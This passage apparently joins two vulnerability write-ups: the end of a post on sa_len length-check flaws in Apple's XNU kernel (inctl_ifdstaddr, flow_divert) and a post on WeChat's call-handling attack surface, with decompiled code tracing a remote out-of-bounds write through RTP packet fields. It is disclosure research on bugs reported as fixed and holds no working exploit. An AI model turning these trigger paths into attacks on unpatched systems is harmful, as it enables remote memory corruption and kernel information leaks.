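    switch (dst->sa_family) {
    case BSD_AF_INET:  return dst->sa_len == BSD_SIN_SIZE ? 0 : -1;
    case BSD_AF_INET6: return dst->sa_len == BSD_SIN6_SIZE ? 0 : -1;
    default:           return -1;
    }
}
```

An AF_UNIX address with sa_len 0xff passes check_flawed() but is rejected by check_fixed(); well-formed AF_INET addresses pass both.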

Vulnerability 1 ==> inctl_ifdstaddr

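After studying Ian Beer’s bug, we began to wonder whether XNU has similar problems elsewhere: an incoming sockaddr that is checked only for some family/length combinations, while sockaddrs of other families go unchecked and are still used.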

With this question in mind, we kept auditing the XNU code, and we soon found a new information leak in the ioctl handler (the in_control function).

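The root cause is that when inctl_ifdstaddr handles the SIOCSIFDSTADDR command, it only takes care of sin_len when the family is AF_INET. When the family is anything else (for example AF_INET6), sin_len is not checked and can hold any value.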

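As shown below, ifr points to user-controlled data. When handling SIOCSIFDSTADDR, inctl_ifdstaddr first copies the user-controlled destination address from ifr into ia, and then, at (a), handles the AF_INET case by setting ia->ia_dstaddr.sin_len to the size of struct sockaddr_in.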

However, when the family is some other value, such as AF_INET6, inctl_ifdstaddr does nothing, so ia->ia_dstaddr.sin_len is still the user-controlled length copied from ifr, anywhere in the range 0 to 0xff.

static __attribute__((noinline)) int
inctl_ifdstaddr(struct ifnet *ifp, struct in_ifaddr *ia, u_long cmd,
    struct ifreq *ifr){
  //...
	case SIOCSIFDSTADDR:            /* struct ifreq */
		VERIFY(ia != NULL);
		IFA_LOCK(&ia->ia_ifa);
		dstaddr = ia->ia_dstaddr;
		bcopy(&ifr->ifr_dstaddr, &ia->ia_dstaddr, sizeof(dstaddr));
		if (ia->ia_dstaddr.sin_family == AF_INET) {
			ia->ia_dstaddr.sin_len = sizeof(struct sockaddr_in); <== a: sin_len is only handled when the family is AF_INET
		}
		//...
}
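The following hypothetical sketch isolates the copy-then-fix-up-one-family pattern of inctl_ifdstaddr. It mirrors Darwin’s struct sockaddr_in layout (Linux lacks sin_len), and set_dstaddr_patched() follows the fix described later in this post, which forces both the family and sin_len to AF_INET values.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Mirror of Darwin's struct sockaddr_in (Linux has no sin_len field). */
struct bsd_sockaddr_in {
    uint8_t  sin_len;
    uint8_t  sin_family;
    uint16_t sin_port;
    uint32_t sin_addr;
    char     sin_zero[8];
};
#define BSD_AF_INET  2
#define BSD_AF_INET6 30

/* Vulnerable shape: copy the user's address wholesale, then normalize
 * sin_len only when the family happens to be AF_INET. */
static void set_dstaddr_vulnerable(struct bsd_sockaddr_in *dst,
                                   const struct bsd_sockaddr_in *user)
{
    memcpy(dst, user, sizeof(*dst));
    if (dst->sin_family == BSD_AF_INET)
        dst->sin_len = sizeof(struct bsd_sockaddr_in);
}

/* Patched shape: force both the family and the length. */
static void set_dstaddr_patched(struct bsd_sockaddr_in *dst,
                                const struct bsd_sockaddr_in *user)
{
    memcpy(dst, user, sizeof(*dst));
    dst->sin_family = BSD_AF_INET;
    dst->sin_len = sizeof(struct bsd_sockaddr_in);
}
```

With an AF_INET6 family and sin_len 0xff, the vulnerable version keeps the attacker’s length, while the patched version always stores 16.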

At this point, we can store a non-AF_INET sockaddr with an arbitrary sin_len in ia->ia_dstaddr. The next question is: where is ia->ia_dstaddr used?

Continuing the audit, we found a use of ia->ia_dstaddr in sysctl_iflist. In the code below, ifa->ifa_dstaddr is exactly the ia->ia_dstaddr set in inctl_ifdstaddr. At (b), this sockaddr is stored in rti_info, which is then passed to rt_msg2 at (c).

static int
sysctl_iflist(int af, struct walkarg *w)
{
  while ((ifa = ifa->ifa_link.tqe_next) != NULL) {
        //...
        info.rti_info[RTAX_IFA] = ifa->ifa_addr;
	info.rti_info[RTAX_NETMASK] = ifa->ifa_netmask;
	info.rti_info[RTAX_BRD] = ifa->ifa_dstaddr; <== b: the sockaddr set earlier
//...
	len = rt_msg2(RTM_NEWADDR, &info, (caddr_t)cp, NULL, &cred); <== c
          //...
    }

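Now let’s look at rt_msg2. It loops over the rtinfo array; when it reaches RTAX_BRD, sa is ifa->ifa_dstaddr (d). So, as shown at (e), dlen is the user-controlled length from before, up to 0xff. When rt_msg2 then calls bcopy at (f), an out-of-bounds read occurs that copies out up to 255 bytes. The leaked data may contain function pointers, resulting in an information leak.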

static int
rt_msg2(int type, struct rt_addrinfo *rtinfo, caddr_t cp, struct walkarg *w,
    kauth_cred_t* credp){
  for (i = 0; i < RTAX_MAX; i++) {
    //...
  	if ((sa = rtinfo->rti_info[i]) == NULL) { <== d: when i reaches RTAX_BRD, sa is ifa->ifa_dstaddr
			continue;
		}
    //...
    rtinfo->rti_addrs |= (1 << i);
		dlen = sa->sa_len; 	<== e: when i reaches RTAX_BRD, dlen is user-controlled
		rlen = ROUNDUP32(dlen);
		if (cp) {
			bcopy((caddr_t)sa, cp, (size_t)dlen); <== f: cp is eventually copied out to user space
			if (dlen != rlen) {
				bzero(cp + dlen, rlen - dlen);
			}
			cp += rlen;
		}
		len += rlen;
  }
  //...
}
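To quantify the over-read, the sketch below reproduces the rounding step and counts how many bytes bcopy() would read beyond a 16-byte sockaddr_in. The ROUNDUP32 definition is our assumption of the rtsock.c macro (round up to a multiple of 4, with 0 mapped to 4), and overread_bytes() is a hypothetical helper.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed to match the rtsock.c helper: round up to a multiple of 4,
 * mapping 0 to 4. */
#define ROUNDUP32(a) \
    ((a) > 0 ? (1 + (((a) - 1) | (sizeof(uint32_t) - 1))) : sizeof(uint32_t))

/* Hypothetical helper: bytes that bcopy(sa, cp, dlen) reads beyond an
 * address field that is really only `field_size` bytes long. */
static size_t overread_bytes(uint8_t sa_len, size_t field_size)
{
    size_t dlen = sa_len;
    return dlen > field_size ? dlen - field_size : 0;
}
```

With sa_len set to 0xff, dlen rounds up to 256 in the output buffer, and 239 of the copied bytes come from memory past the 16-byte address.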

Our PoC output is shown below. After reading function pointers out of bounds, we can compute the kernel slide.

Vulnerability 2 ==> flow_divert_is_sockaddr_valid

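The information leak above is not an isolated case; clearly, the developers made the same mistake as in mptcp. Let’s loosen the bug pattern a bit and look at how other XNU modules check the sa_len field.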

We soon found the following code in flow_divert_is_sockaddr_valid.

static boolean_t
flow_divert_is_sockaddr_valid(struct sockaddr *addr)
{
	switch (addr->sa_family) {
	case AF_INET:
		if (addr->sa_len < sizeof(struct sockaddr_in)) { <== should be !=
			return FALSE;
		}
		break;
#if INET6
	case AF_INET6:
		if (addr->sa_len < sizeof(struct sockaddr_in6)) { <== should be !=
			return FALSE;
		}
		break;
#endif  /* INET6 */
	default:
		return FALSE;
	}
	return TRUE;
}

As its name suggests, flow_divert_is_sockaddr_valid verifies whether a sockaddr is valid, and it explicitly restricts the sockaddr to AF_INET or AF_INET6. In the length check, however, it makes a basic mistake: it only checks that addr->sa_len is not smaller than the actual structure size, without considering that sa_len may be larger.

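Therefore, as long as the sockaddr passed in is AF_INET or AF_INET6, an attacker can set an oversized sa_len and cause out-of-bounds memory access when flow_divert later uses the sockaddr. Interested readers can try to construct a PoC themselves.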
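The difference between the two comparisons is easy to see in isolation. In this hypothetical sketch, len_ok_lower_bound() mirrors the AF_INET arm of flow_divert_is_sockaddr_valid, and len_ok_exact() uses the != comparison suggested in the annotations; 16 is Darwin’s sizeof(struct sockaddr_in).

```c
#include <assert.h>
#include <stdint.h>

#define BSD_SIN_SIZE 16  /* sizeof(struct sockaddr_in) on Darwin */

/* Mirrors the AF_INET arm of flow_divert_is_sockaddr_valid: only a lower
 * bound, so any oversized sa_len is accepted. */
static int len_ok_lower_bound(uint8_t sa_len)
{
    return !(sa_len < BSD_SIN_SIZE);
}

/* With != instead of <: the length must match the structure exactly. */
static int len_ok_exact(uint8_t sa_len)
{
    return sa_len == BSD_SIN_SIZE;
}
```

An sa_len of 0xff passes the lower-bound check but fails the exact check; a too-short length fails both.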

0x02 Fixes

Apple fixed the first leak in the latest iOS 13.6. Comparing against the open-source xnu-6153.141.1, we found the following patch.

In the code above, when inctl_ifdstaddr handles the SIOCSIFDSTADDR command, it forcibly sets the family and sin_len fields of ia->ia_dstaddr to AF_INET values.

Apple fixed the second vulnerability in iOS 13.5. Rather than changing flow_divert_is_sockaddr_valid itself, Apple added a length check in the code that calls it.

0x03 Summary

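In this post, we shared how, after Ian Beer published the mptcp vulnerability, we analyzed its root cause, distilled its characteristics, and used those characteristics to find new vulnerabilities. Vulnerability hunting really tests a researcher’s ability to generalize from a single case, and quickly zeroing in on suspicious code within a large codebase greatly improves efficiency. Analyzing past vulnerabilities helps a lot with locating such code. Moreover, sockaddr is such a simple data structure, yet across its many type conversions, any gap in the type and length checks can lead to serious security problems. Beyond the two vulnerabilities shared here, I believe other similar issues can be found.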

Credit: The vulnerabilities were discovered by Xinru Chi and Tielei Wang of Pangu Lab and reported to Apple.

A Brief Study and Analysis of WeChat’s Remote Attack Surface

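After completing a series of vulnerability research on FaceTime, we decided to analyze WeChat’s audio and video calls. We found that once a WeChat voice call is established, the WeChat client parses the network packets sent by the remote side and reassembles them into multimedia streams. If the code that handles this remote data is flawed, the parsing process becomes a remote attack surface.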

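Digging deeper into this attack surface, we found several vulnerabilities that can cause remote memory corruption. In this article we pick one of the more interesting and complex ones for an in-depth analysis. It can cause a remote write overflow that crashes the app; its root cause is hidden very deep and the trigger path is fairly involved, so studying it is valuable from both a security research and a software development perspective. We analyze the root cause and the trigger flow in detail. WeChat has fixed this vulnerability in the latest version, 7.0.12.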

Appetizers

Let’s start with two relatively simple vulnerabilities: one local code execution and one remote overflow.

Local code execution

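When handling a paste operation, WeChat for Mac does not properly check the contents of the pasteboard object, leading to insecure object deserialization. If another malicious local application sets the pasteboard, pasting in the WeChat client causes arbitrary objects to be created.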

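As the screenshot below shows, WeChat for Mac deserializes pasteboard objects without secure coding or a class allowlist, so any Objective-C object that responds to initWithCoder: can be created and used, which opens up a very large attack surface.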

Pasteboard handling in WeChat for Mac

For the concrete impact of such attacks, see the many insecure deserialization attacks that Google Project Zero found in iMessage (https://www.blackhat.com/us-19/briefings/schedule/#look-no-hands—-the-remote-interaction-less-attack-surface-of-the-iphone-15203).

WeChat for Mac has fixed this vulnerability completely and correctly by calling setRequiresSecureCoding: with a secure setting.

Pasteboard handling after the fix

Remote underflow

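Once a WeChat video call is connected, the two endpoints establish a direct network connection to exchange RTP packets. The WeChat client uses an encryption scheme when transmitting RTP packets, but it does not properly validate the RTP packet length before decryption. When an attacker sends a very short RTP packet, the length calculation on the receiving side underflows, which leads to out-of-bounds memory access.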

Subtraction underflow in RTP packet length validation

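Interestingly, a Google Project Zero researcher found a similar bug in WeChat’s CAudioJBM::InputAudioFrameToJBM function (https://bugs.chromium.org/p/project-zero/issues/detail?id=1948). This suggests that WeChat has a recurring weakness in packet length validation.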

This underflow is very obvious, but analyzing it convinced us that the remote attack surface might hide higher-risk vulnerabilities.
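The underflow pattern itself is generic. In this hypothetical sketch, RTP_HEADER_LEN uses the 12-byte RTP fixed header from RFC 3550 purely for illustration, since WeChat’s actual header and encryption overhead are not given in the post. payload_len_unchecked() shows the wrap, and payload_len_checked() rejects short packets before subtracting.

```c
#include <assert.h>
#include <stdint.h>

/* Assumption for illustration: the 12-byte RTP fixed header (RFC 3550). */
#define RTP_HEADER_LEN 12u

/* Unchecked: a packet shorter than the header wraps to a huge length. */
static uint32_t payload_len_unchecked(uint32_t pkt_len)
{
    return pkt_len - RTP_HEADER_LEN;
}

/* Checked: reject short packets before subtracting. */
static int payload_len_checked(uint32_t pkt_len, uint32_t *out)
{
    if (pkt_len < RTP_HEADER_LEN)
        return -1;
    *out = pkt_len - RTP_HEADER_LEN;
    return 0;
}
```

A 4-byte packet yields 0xFFFFFFF8 from the unchecked version, a length that any later copy or decrypt loop would treat as enormous.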

Remote write overflow: root cause and analysis

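Skipping the complicated negotiation and connection setup, suppose a WeChat voice call is already established. The WeChat client then receives audio data sent by the remote side. The raw data is unpacked layer by layer and dispatched to different handlers according to its type.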

RecvRtpPacketCng

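After network data arrives from the remote side, RTP packets are handled by RecvRtpPacketCng(__int64 XVEChannel, unsigned int *pData, __int16 len, void *a4). The contents of pData are fully controlled by the remote party of the call. Based on the type specified in the packet, the function dispatches the data to different parsing code: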

 switch ( pkType )
  {
    case 0:
      log1(1, "*************  XVEChannel:: pkType == 0x80 \r\n\r\n");
      if ( (unsigned int)UnpacketRTP(
                           (unsigned int **)&pCur,
                           (unsigned int *)&nCodec,
                           &udwTimeStamp,
                           udwSeqNum,
                           &redundantlen,
                           &pDataLength) == -1 )
      {
        log1(1, "\r\nXVEChannel::RecvRtpPacket, UnpacketRTP ERROR,! \r\n");
        v15 = wc_gettimeofday() - v189;
        v16 = "leave RecvRtpPacketCng 3,time in %llu\n";
        goto LABEL_17;
      }
    //...
  }

When pkType is 7 or 8, the packet type is RTPwithRsMd:

      // pcur = pdata+8
      while ( 1 )
      {
        get_subpkttype_and_subpktleft(*v54, pCur, (int *)&sub_pkt_type, &sub_pkt_left);
        log1(1, "subpkttype is %d,subpktleft is %d\r\n", sub_pkt_type, sub_pkt_left);
        LOBYTE(v185) = sub_pkt_left != 0;
        if ( sub_pkt_type == 1 )
          break;
        if ( sub_pkt_type )
          goto LABEL_125;
        v55 = (unsigned int *)operator new(4uLL, (const std::nothrow_t *)&std::nothrow);
        if...
        PacketMeta = v55;
        getSubPacketMetaData(*v54, (_BYTE *)pCur, v55);
        v57 = *PacketMeta;
        v58 = (unsigned __int8)(*PacketMeta >> 16);
        nLen = v58 + ((unsigned __int64)((*PacketMeta >> 24) & 1) << 8);
        v54 = (__int64 *)v179;
        v40 = v189;
        log1(
          4,
          "RecvRtpPacket::pkttype=%d,blocknum=%d,d=%d,f=%d,k=%d,r=%d,symid=%d,symlen_high2bits= %d,symlen_low8bits= %d,len = %d\n",
          *PacketMeta & 3,
          BYTE1(v57),
          (*PacketMeta >> 29) & 3,
          *PacketMeta >> 31,
          (*PacketMeta >> 2) & 7,
          (*PacketMeta >> 5) & 7,
          (*PacketMeta >> 25) & 0xF,
          (*PacketMeta >> 24) & 1,
          v58,
          v58 + ((unsigned __int64)((*PacketMeta >> 24) & 1) << 8));
        RsMdDecProcess(*v54, (unsigned __int8 *)(pCur + 4), nLen, *PacketMeta, udwTimeStamp, udwSeqNum[0], (char)v184);
        pCur += nLen + 4;
        operator delete(PacketMeta);
        v60 = (char)v185;
LABEL_123:
        v53 = XVEChannel;
        if ( !v60 || nCodec == 8 )
          goto LABEL_125;
      }
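The 32-bit sub-packet header that getSubPacketMetaData fills in can be decoded as below. The bit positions are inferred from the log1() format string and the nLen computation in the listing above; the struct and function names are ours, and since the listing does not show how the four bytes are assembled from pCur (byte order), the sketch starts from the already-assembled value.

```c
#include <assert.h>
#include <stdint.h>

/* Field layout inferred from the log1() call in RecvRtpPacketCng;
 * names are ours, not WeChat's. */
struct sub_pkt_meta {
    unsigned pkttype;   /* bits 0-1   */
    unsigned k;         /* bits 2-4   */
    unsigned r;         /* bits 5-7   */
    unsigned blocknum;  /* bits 8-15  */
    unsigned symlen;    /* bits 16-24: 9-bit length (low 8 bits + 1 high bit) */
    unsigned symid;     /* bits 25-28 */
    unsigned d;         /* bits 29-30 */
    unsigned f;         /* bit 31     */
};

static struct sub_pkt_meta decode_meta(uint32_t m)
{
    struct sub_pkt_meta s;
    s.pkttype  = m & 3;
    s.k        = (m >> 2) & 7;
    s.r        = (m >> 5) & 7;
    s.blocknum = (m >> 8) & 0xFF;
    s.symlen   = ((m >> 16) & 0xFF) + (((m >> 24) & 1) << 8);  /* same as nLen */
    s.symid    = (m >> 25) & 0xF;
    s.d        = (m >> 29) & 3;
    s.f        = m >> 31;
    return s;
}
```

The 9-bit length (at most 511) is what RsMdDecProcess receives as nLen, and pCur then advances by nLen + 4.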

After the subpkt headers of the packet have been parsed, ParaseRemoteLostRateParam is called:

  if ( v62 )
      {
        v63 = v62;
        sub_101078AE4(*v54, (_BYTE *)pCur, v62);
        log1(4, "RecvRtpPacket::pkttype=%d,f=%d,subtype=%d,len = %d\n", *v63 & 3, (*v63 >> 2) & 1, *v63 >> 3, v63[1]);
        v64 = v63[1];
        if ( *v63 <= 7u && (!byte_102A0E985 || !*(_BYTE *)(*(_QWORD *)(XVEChannel + 1800) + 3887LL)) )
        {
          v65 = v60;
          ParaseRemoteLostRateParam(*(_QWORD *)(XVEChannel + 72), (unsigned __int8 *)(pCur + 2), v63[1]); //<<==== [1]
          v185 = (unsigned __int8 *)pCur;
          v67 = (unsigned int)*(__int16 *)(XVEChannel + 46276);
          v60 = v65;
          log1(4, "usSetBitrateFlag:%d,sizeofLen:%d\n", v67, 3LL);
 ...
      }

ParaseRemoteLostRateParam sets internal fields of the object at XVEChannel+72 from the remote pData. Through parameter a2 it reads two bytes from pData and stores them in the member variables m_RemoteLrParam and nFrmCnt.

__int64 __fastcall ParaseRemoteLostRateParam(__int64 XVEChannel_72, __int64 a2, unsigned int a3)
{
  // [local variable declarations omitted]

  if ( a2 )
  {
    if ( a3 >= 3 )
    {
      v3 = *(unsigned __int8 *)a2;
      v4 = *(unsigned __int8 *)(a2 + 1);
      *(_BYTE *)(XVEChannel_72 + 1660) = v4;    // nFrmCnt
      *(_BYTE *)(XVEChannel_72 + 1659) = v3;    // m_RemoteLrParam k: r: d:
      result = log1(
                 4,
                 "ParaseRemoteLostRateParam:: m_RemoteLrParam k: %d, r: %d, d: %d, nFrmCnt: %d \r\n",
                 v3 & 7,
                 (v3 >> 3) & 7,
                 v3 >> 6,
                 v4);
      ++*(_DWORD *)(XVEChannel_72 + 528);
      *(_DWORD *)(XVEChannel_72 + 1712) = 1;
    }
  }
  return result;
}

DevPutProcessRsMdCng

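While receiving the remote peer's voice data, the client also has to send its own voice data to the remote side through the `XVEChannel` object. This is done in DevPutProcessRsMdCng: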

__int64 __fastcall DevPutProcessRsMdCng(__int64 XVEChannel, const void *a2, __int64 a3, unsigned int a4)
{
  // [local variable declarations omitted]

  v4 = a4;
  nDataLen = (unsigned int)a3;
  v6 = a2;
  v93 = 0;
  v85 = 0;
  log1(
    1,
    "===== Enter DevPutProcessRsMdCng, input len = %d,nCoderFrameLen = %d,m_bFecStatus = %d,bChannelDtxFlag :%d !\r\n",
    a3,
    *(unsigned int *)(XVEChannel + 196),
    *(unsigned __int8 *)(XVEChannel + 208),
    a4);
  XVEChannel_72 = *(_QWORD *)(XVEChannel + 72);
  if ( *(_DWORD *)(XVEChannel_72 + 1712) == 1 )
  {
    readRemoteLrParam(XVEChannel_72, (__int64)&v92);  //<=================== read m_RemoteLrParam and nFrmCnt
  }
  else if ( (unsigned int)(*(_DWORD *)(XVEChannel + 1828) - 1) > 1 )
  {
    v92 = 0x20A;
  }
  else
  {
    v92 = 0x301;
  }

readRemoteLrParam copies the m_RemoteLrParam and nFrmCnt values that were just set into the stack variable v92.

char __fastcall readRemoteLrParam(__int64 a1, __int64 a2)
{
  char result; // al
  char v3; // cl
  char v4; // dl

  *(_BYTE *)(a2 + 1) = *(_BYTE *)(a1 + 1660);
  result = *(_BYTE *)(a1 + 1659) & 7;
  v3 = result | *(_BYTE *)a2 & 0xF8;
  *(_BYTE *)a2 = v3;
  v4 = *(_BYTE *)(a1 + 1659) & 0x38;
  *(_BYTE *)a2 = v4 | v3 & 0xC7;
  *(_BYTE *)a2 = *(_BYTE *)(a1 + 1659) & 0xC0 | result | v4;
  return result;
}

After `RemoteLostRateParam` has been read into the local variable v92, its values are stored in the corresponding local member variables:

  if ( !*(_DWORD *)(XVEChannel + 392)
    && (unsigned __int8)(HIBYTE(v92) - 1) <= 2u
    && (int)v15 <= *(_DWORD *)(XVEChannel + 384) * (*(int *)(XVEChannel + 196) >> 1) )
  {
    DevPutProcessRsMdCng_SetLocalExpectRSPara(
      *(_QWORD *)(XVEChannel + 72),
      v92 & 7,
      ((unsigned __int8)v92 >> 3) & 7,
      (unsigned __int8)v92 >> 6);
    log1(
      4,
      "DevPutProcessRsMdCng_SetLocalExpectRSPara:: m_iNetworkType = %d,nFrmCnt: %d, k: %d, r: %d, d: %d\n",
      *(unsigned int *)(XVEChannel + 1828),
      HIBYTE(v92),
      v92 & 7,
      ((unsigned __int8)v92 >> 3) & 7,
      (unsigned __int8)v92 >> 6);
    v15 = *(unsigned int *)(XVEChannel + 332);
  }


void __fastcall DevPutProcessRsMdCng_SetLocalExpectRSPara(__int64 XVEChannel_72, char a2, char a3, char a4)
{
  *(_BYTE *)(XVEChannel_72 + 64) = a2;
  *(_BYTE *)(XVEChannel_72 + 65) = a3;
  *(_BYTE *)(XVEChannel_72 + 66) = a4;
}
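Putting the last four listings together, the path from the two attacker-chosen bytes to LocalExpectRSPara can be modeled as below. This is a simplified sketch: the struct, its field names and both functions are ours (the comments give the offsets they stand for), and of the three conditions guarding DevPutProcessRsMdCng_SetLocalExpectRSPara only the nFrmCnt check is modeled.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of the fields touched on this path. */
struct rs_state {
    uint8_t remote_lr_param;      /* XVEChannel_72 + 1659 */
    uint8_t frm_cnt;              /* XVEChannel_72 + 1660 */
    int     have_remote;          /* XVEChannel_72 + 1712 */
    uint8_t exp_k, exp_r, exp_d;  /* XVEChannel_72 + 64, 65, 66 */
};

/* ParaseRemoteLostRateParam: requires len >= 3, copies two attacker bytes. */
static void parse_remote_lr(struct rs_state *s, const uint8_t *p, unsigned len)
{
    if (p == NULL || len < 3)
        return;
    s->remote_lr_param = p[0];
    s->frm_cnt = p[1];
    s->have_remote = 1;
}

/* readRemoteLrParam + the nFrmCnt gate + SetLocalExpectRSPara.
 * The other two gate conditions (offsets 392, 384, 196) are omitted. */
static int apply_remote_lr(struct rs_state *s)
{
    if (!s->have_remote)
        return 0;
    uint16_t v92 = (uint16_t)(s->remote_lr_param | (s->frm_cnt << 8));
    if ((uint8_t)((v92 >> 8) - 1) > 2)     /* nFrmCnt must be 1, 2 or 3 */
        return 0;
    s->exp_k = v92 & 7;
    s->exp_r = (v92 >> 3) & 7;
    s->exp_d = (v92 & 0xFF) >> 6;
    return 1;
}
```

readRemoteLrParam reassembles the k, r and d bit fields into the same byte it read, so the low byte of v92 is exactly the attacker's first byte.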

Once the data is ready, CAudioRS::RsMdEncProcessCng is called. This is where the out-of-bounds write happens.

 CAudioRS::RsMdEncProcessCng(
          *(_QWORD *)(XVEChannel + 72),
          *(const void **)(XVEChannel + 312),
          (unsigned int)(*(_DWORD *)(XVEChannel + 400) + *(_DWORD *)(XVEChannel + 384) + 1),
          (__int64)v80,
          &v85,
          *(_DWORD *)(XVEChannel + 356) - v57,
          v76,
          v87 & 1,
          v90 & 1);

At the very start of CAudioRS::RsMdEncProcessCng, one byte is written using the value at XVEChannel_72+9 as the index:

__int64 __fastcall CAudioRS::RsMdEncProcessCng(__int64 XVEChannel_72, const void *a2, __int64 a3, __int64 a4, int *a5, unsigned int a6, unsigned __int8 a7, unsigned __int8 a8, unsigned __int8 a9)
{
  // [local variable declarations omitted]

  v9 = a6;
  v10 = a3;
  log1(
    4,
    "Enter CAudioRS::RsMdEncProcessCng,nInLen is %d, uiTimeStamp is %u,m_cEncSourceCountInBlk = %d,m_cEncK = %d,m_cEncR ="
    " %d,bSilencePk = %d,bFirstSilencePk = %d,bCngSend = %d\r\n",
    a3,
    a6,
    (unsigned int)*(char *)(XVEChannel_72 + 9),
    (unsigned int)*(char *)(XVEChannel_72 + 4),
    (unsigned int)*(char *)(XVEChannel_72 + 5),
    a7,
    a8,
    a9);
  *(_DWORD *)(XVEChannel_72 + 16) = v9;
  if...
  *(_BYTE *)(XVEChannel_72 + *(char *)(XVEChannel_72 + 9) + 1668) = a7;
  v11 = RsMdEncQueueSourcePktCng(XVEChannel_72, a2, v10, a7 ^ 1u);

Then, in RsMdEncQueueSourcePktCng, the byte at XVEChannel_72 + 9 is incremented once.

 if ( a4 )
    {
      memcpy(v9, a2, a3);
      *(_DWORD *)(XVEChannel_72 + 568) = (unsigned __int16)((unsigned __int16)*(_DWORD *)XVEChannel_72 << 8) | (unsigned __int8)(32 * *(_BYTE *)(XVEChannel_72 + 5)) | (a3 << 16) & 0x1FF0000 | ((*(_BYTE *)(XVEChannel_72 + 8) & 0xF) << 25) | (4 * *(_BYTE *)(XVEChannel_72 + 4) + 28) & 0x1C | ((*(_BYTE *)(XVEChannel_72 + 6) & 3) << 29);
      v10 = *(_QWORD *)(XVEChannel_72 + 544);
      if ( v10 )
      {
        v11 = *(char *)(XVEChannel_72 + 9);
        if ( v11 <= 31 )
        {
          v12 = 1026 * v11;
          *(_WORD *)(v10 + v12 + 1024) = a3;
          memcpy((void *)(v10 + v12), a2, a3);
          if ( a3 > *(__int16 *)(XVEChannel_72 + 10) )
            *(_WORD *)(XVEChannel_72 + 10) = a3;
        }
      }
    }
    ++*(_BYTE *)(XVEChannel_72 + 9);   // increment
    ++*(_BYTE *)(XVEChannel_72 + 8);
    v13 = 0;
    log1(4, "Exit RsMdEncQueueSourcePktCng Success\r\n");

Before CAudioRS::RsMdEncProcessCng returns, it updates member variables according to the current state.

    update_data(XVEChannel_72);                           //<=====================[1]
    v13 = *(char *)(XVEChannel_72 + 9);                   
    if ( (_BYTE)v13 == *(_BYTE *)(XVEChannel_72 + 4) )    //<=====================[2]
    {
      while ( v13 > 0 )
      {
        if ( *(_BYTE *)(XVEChannel_72 + v13-- + 1667) != 0 )
        {
          v15 = *(_BYTE *)(XVEChannel_72 + 5);
          v16 = *(_BYTE *)(XVEChannel_72 + 8);
          if ( v15 > 0 )
          {
            v16 += v15;
            *(_BYTE *)(XVEChannel_72 + 8) = v16;
          }
          log1(4, "   bRsCodeG = false,m_cEncCountInBlk = %d", (unsigned int)v16);
          goto LABEL_13;
        }
      }
      if ( *(char *)(XVEChannel_72 + 5) > 0 )
        CAudioRS::RsMdCodeGenerate(XVEChannel_72);
LABEL_13:
      *(_DWORD *)(XVEChannel_72 + 8) = 0;              //<======================[3]
      ++*(_DWORD *)XVEChannel_72;
      *(_BYTE *)(XVEChannel_72 + 12) = 1;
    }

[1] `update_data` modifies member variables according to the values of `LocalExpectRSPara`:

__int64 __fastcall update_data(__int64 XVEChannel_72)
{
  char v1; // al
  __int16 v2; // cx

  v1 = *(_BYTE *)(XVEChannel_72 + 64);
  if ( (*(_BYTE *)(XVEChannel_72 + 4) != v1
     || *(_BYTE *)(XVEChannel_72 + 5) != *(_BYTE *)(XVEChannel_72 + 65)
     || *(_BYTE *)(XVEChannel_72 + 6) != *(_BYTE *)(XVEChannel_72 + 66))
    && *(_BYTE *)(XVEChannel_72 + 9) == 1 )
  {
    v2 = *(_WORD *)(XVEChannel_72 + 65);     // set by DevPutProcessRsMdCng_SetLocalExpectRSPara from RemoteLrParam
    *(_BYTE *)(XVEChannel_72 + 4) = v1;
    *(_WORD *)(XVEChannel_72 + 5) = v2;      // WORD write: updates both +5 (r) and +6 (d)
  }
  return 0LL;
}

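[2] If the value at XVEChannel_72+9 equals the value at XVEChannel_72+4, the code at [3] runs and writes 0 over XVEChannel_72+9.

Because the attacker can influence these parameters through the data in pData, XVEChannel_72 + 9 can end up greater than XVEChannel_72 + 4. In that case XVEChannel_72 + 9 is reset to zero only after it has kept incrementing, wrapped around, and become equal to XVEChannel_72 + 4 again.

So XVEChannel_72 + 9 can take any byte value from 0 to 255. Because ` *(_BYTE *)(XVEChannel_72 + *(char *)(XVEChannel_72 + 9) + 1668) = a7;` uses it as a signed `char` index, the write reaches from `-128` to `127` bytes around `XVEChannel_72+1668`, well beyond the memory the original data structure covers.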
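The reachable window follows directly from the signed cast. In the sketch below (our naming), `write_offset` returns the offset from XVEChannel_72 of the byte written by `*(_BYTE *)(XVEChannel_72 + *(char *)(XVEChannel_72 + 9) + 1668) = a7`, using `int8_t` to make the signedness of `char` explicit (an assumption consistent with the decompiled cast).

```c
#include <assert.h>
#include <stdint.h>

/* Offset (from XVEChannel_72) of the byte written for a given index byte. */
static int write_offset(uint8_t idx_byte)
{
    return 1668 + (int8_t)idx_byte;   /* index is read through a signed char */
}
```

Index bytes 0x00 to 0x7F land at offsets 1668 to 1795, while 0x80 to 0xFF wrap to offsets 1540 to 1667, before the slot that index 0 normally writes.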

Trigger flow

                              +------------+                         +------------+
                              |   local    |                         |   remote   |
                              +-----+------+                         +------+-----+
                                    |                                       |
                                    |                                       |
                                    | <-----------------------------------+ |
                                    |                                       |
+---------------------------------+ |                                       |
| RecvRtpPacketCng                | |                                       |
+-+-------------------------------+ |                                       |
  |    +--------------------------+ |                                       |
  +--> | ParaseRemoteLostRateParam| |                                       |
       +--------------------------+ |                                       |
                                    |                                       |
                                    |                                       |
                                    |                                       |
+---------------------------------+ |                                       |
| DevPutProcessRsMdCng            | |                                       |
+-+-------------------------------+ |                                       |
  |    +--------------------------+ |                                       |
  +--->+ readRemoteLrParam        | |                                       |
  |    +--------------------------+ |                                       |
  |    +--------------------------+ |                                       |
  +--->+ SetLocalExpectRSPara     | |                                       |
  |    +--------------------------+ |                                       |
  |    +--------------------------+ |                                       |
  +--->+ RsMdEncProcessCng        | |                                       |
       +--------------------------+ |                                       |
                                    |                                       |
                                    |                                       |
                                    |                                       |
                                    |                                       |
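  • RecvRtpPacketCng extracts lrParam from the network packet
  • DevPutProcessRsMdCng sets LocalExpectRSPara from lrParam
  • RsMdEncProcessCng updates member variables from LocalExpectRSPara; the byte at XVEChannel_72 + 9 is used as the index for the data write
  • After each write the index is incremented and compared with the local maximum index_max (`XVEChannel_72 + 4`); when the index reaches index_max it is reset to zero
    • If the remote data drives the index above index_max, the index keeps incrementing until it wraps around, and only then satisfies index == index_max and reaches the reset logic
    • Along the way the index walks through every value from -128 to 127, so the out-of-bounds write covers the range -128 to 127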
